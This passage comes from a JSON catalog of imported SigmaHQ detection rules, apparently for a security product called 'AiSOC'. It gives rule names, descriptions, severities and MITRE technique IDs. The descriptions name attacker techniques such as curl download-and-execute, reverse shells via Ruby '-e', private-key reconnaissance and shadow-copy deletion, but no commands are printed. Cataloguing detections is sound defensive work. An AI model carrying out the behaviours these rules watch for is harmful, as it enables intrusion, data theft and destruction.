yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1fbc0671-5596-4e17-8682-f020a0b995dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_ccleaner_du.yml" } }, { "id": "sigmahq-sigma-1fc0809e-06bf-4de3-ad52-25e5263b7623", "type": "detection", "name": "Publicly Accessible RDP Service", "description": "Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/publicly-accessible-rdp-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1fc0809e-06bf-4de3-ad52-25e5263b7623", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_rdp_public_listener.yml" } }, { "id": "sigmahq-sigma-1ff315dc-2a3a-4b71-8dde-873818d25d39", "type": "detection", "name": "New BITS Job Created Via Bitsadmin", "description": "Detects the creation of a new bits job by Bitsadmin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bits-job-created-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml" } }, { "id": "sigmahq-sigma-20384606-a124-4fec-acbb-8bd373728613", "type": "detection", "name": "Suspicious Network Connection Binary No CommandLine", "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-connection-binary-no-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20384606-a124-4fec-acbb-8bd373728613", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" } }, { "id": "sigmahq-sigma-204b17ae-4007-471b-917b-b917b315c5db", "type": "detection", "name": "Greedy File Deletion Using Del", "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/greedy-file-deletion-using-del.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "204b17ae-4007-471b-917b-b917b315c5db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml" } }, { "id": "sigmahq-sigma-2053961f-44c7-4a64-b62d-f6e72800af0d", "type": "detection", "name": "Remote Event Log Recon", "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-event-log-recon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2053961f-44c7-4a64-b62d-f6e72800af0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" } }, { "id": "sigmahq-sigma-2074e137-1b73-4e2d-88ba-5a3407dbdce0", "type": "detection", "name": "Notepad++ Updater DNS Query to Uncommon Domains", "description": "Detects when the Notepad++ updater (gup.exe) makes DNS queries to domains that are not part of the known legitimate update infrastructure.\nThis could indicate potential exploitation of the updater mechanism or suspicious network activity that warrants further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/notepad-updater-dns-query-to-uncommon-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2074e137-1b73-4e2d-88ba-5a3407dbdce0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_gup_query_to_uncommon_domains.yml" } }, { "id": "sigmahq-sigma-207b0396-3689-42d9-8399-4222658efc99", "type": "detection", "name": "Potential Privilege Escalation To LOCAL SYSTEM", "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-to-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "207b0396-3689-42d9-8399-4222658efc99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml" } }, { "id": "sigmahq-sigma-208748f7-881d-47ac-a29c-07ea84bf691d", "type": "detection", "name": "Suspicious Outlook Child Process", "description": "Detects a suspicious process spawning from an Outlook process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-outlook-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "208748f7-881d-47ac-a29c-07ea84bf691d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-2092cacb-d77b-4f98-ab0d-32b32f99a054", "type": "detection", "name": "Potential Vivaldi_elf.DLL Sideloading", "description": "Detects potential DLL sideloading of \"vivaldi_elf.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-vivaldi-elf-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2092cacb-d77b-4f98-ab0d-32b32f99a054", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vivaldi_elf.yml" } }, { "id": "sigmahq-sigma-20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "type": "detection", "name": "Ruby Inline Command Execution", "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ruby-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-20d96d95-5a20-4cf1-a483-f3bda8a7c037", "type": "detection", "name": "Add or Remove Computer from DC", "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-or-remove-computer-from-dc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_add_remove_computer.yml" } }, { "id": "sigmahq-sigma-20e5497e-331c-4cd5-8d36-935f6e2a9a07", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" } }, { "id": "sigmahq-sigma-20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", "type": "detection", "name": "CurrentVersion Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" } }, { "id": "sigmahq-sigma-20f754db-d025-4a8f-9d74-e0037e999a9a", "type": "detection", "name": "SES Identity Has Been Deleted", "description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ses-identity-has-been-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20f754db-d025-4a8f-9d74-e0037e999a9a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_delete_identity.yml" } }, { "id": "sigmahq-sigma-2111118f-7e46-4fc8-974a-59fd8ec95196", "type": "detection", "name": "DiagTrackEoP Default Login Username", "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diagtrackeop-default-login-username.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml" } }, { "id": "sigmahq-sigma-213d6a77-3d55-4ce8-ba74-fcfef741974e", "type": "detection", "name": "Private Keys Reconnaissance Via CommandLine Tools", "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/private-keys-reconnaissance-via-commandline-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml" } }, { "id": "sigmahq-sigma-214641c2-c579-4ecb-8427-0cf19df6842e", "type": "detection", "name": "Remote File Download Via Desktopimgdownldr Utility", "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-file-download-via-desktopimgdownldr-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "214641c2-c579-4ecb-8427-0cf19df6842e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml" } }, { "id": "sigmahq-sigma-214e7e6c-f21b-47ff-bb6f-551b2d143fcf", "type": "detection", "name": "Clipboard Collection with Xclip Tool - Auditd", "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-collection-with-xclip-tool-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_clipboard_collection.yml" } }, { "id": "sigmahq-sigma-214e8f95-100a-4e04-bb31-ef6cba8ce07e", "type": "detection", "name": "DCERPC SMB Spoolss Named Pipe", "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dcerpc-smb-spoolss-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" } }, { "id": "sigmahq-sigma-21541900-27a9-4454-9c4c-3f0a4240344a", "type": "detection", "name": "OMIGOD SCX RunAsProvider ExecuteShellCommand", "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1190", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/omigod-scx-runasprovider-executeshellcommand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21541900-27a9-4454-9c4c-3f0a4240344a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" } }, { "id": "sigmahq-sigma-2158f96f-43c2-43cb-952a-ab4580f32382", "type": "detection", "name": "Screen Capture Activity Via Psr.EXE", "description": "Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-activity-via-psr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2158f96f-43c2-43cb-952a-ab4580f32382", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml" } }, { "id": "sigmahq-sigma-218d2855-2bba-4f61-9c85-81d0ea63ac71", "type": "detection", "name": "MSSQL Server Failed Logon", "description": "Detects failed logon attempts from clients to MSSQL server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-server-failed-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "218d2855-2bba-4f61-9c85-81d0ea63ac71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml" } }, { "id": "sigmahq-sigma-21d856f9-9281-4ded-9377-51a1a6e2a432", "type": "detection", "name": "Potential Persistence Via Logon Scripts - CommandLine", "description": "Detects the addition of a new LogonScript to the registry value \"UserInitMprLogonScript\" for potential persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-logon-scripts-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21d856f9-9281-4ded-9377-51a1a6e2a432", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_logon_script.yml" } }, { "id": "sigmahq-sigma-21dd6d38-2b18-4453-9404-a0fe4a0cc288", "type": "detection", "name": "Curl Download And Execute Combination", "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/curl-download-and-execute-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml" } }, { "id": "sigmahq-sigma-21e44d78-95e7-421b-a464-ffd8395659c4", "type": "detection", "name": "HTTP Request With Empty User Agent", "description": "Detects a potentially suspicious empty user agent strings in proxy log.\nCould potentially indicate an uncommon request method.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/http-request-with-empty-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21e44d78-95e7-421b-a464-ffd8395659c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_empty.yml" } }, { "id": "sigmahq-sigma-21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "type": "detection", "name": "Import PowerShell Modules From Suspicious Directories", "description": "Detects powershell scripts that import modules from suspicious directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/import-powershell-modules-from-suspicious-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" } }, { "id": "sigmahq-sigma-21ff4ca9-f13a-41ad-b828-0077b2af2e40", "type": "detection", "name": "Deletion of Volume Shadow Copies via WMI with PowerShell", "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deletion-of-volume-shadow-copies-via-wmi-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml" } }, { "id": "sigmahq-sigma-220457c1-1c9f-4c2e-afe6-9598926222c1", "type": "detection", "name": "Delete All Scheduled Tasks", "description": "Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delete-all-scheduled-tasks.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "220457c1-1c9f-4c2e-afe6-9598926222c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml" } }, { "id": "sigmahq-sigma-22154f0e-5132-4a54-aa78-cc62f6def531", "type": "detection", "name": "Vulnerable Driver Blocklist Registry Tampering Via CommandLine", "description": "Detects tampering of the Vulnerable Driver Blocklist registry via command line tools such as PowerShell or REG.EXE.\nThe Vulnerable Driver Blocklist is a security feature that helps prevent the loading of known vulnerable drivers.\nDisabling this feature may indicate an attempt to bypass security controls, often targeted by threat actors\nto facilitate the installation of malicious or vulnerable drivers, particularly in scenarios involving Endpoint Detection and Response", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-driver-blocklist-registry-tampering-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22154f0e-5132-4a54-aa78-cc62f6def531", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering.yml" } }, { "id": "sigmahq-sigma-221b251a-357a-49a9-920a-271802777cc0", "type": "detection", "name": "Process Reconnaissance Via Wmic.EXE", "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "221b251a-357a-49a9-920a-271802777cc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml" } }, { "id": 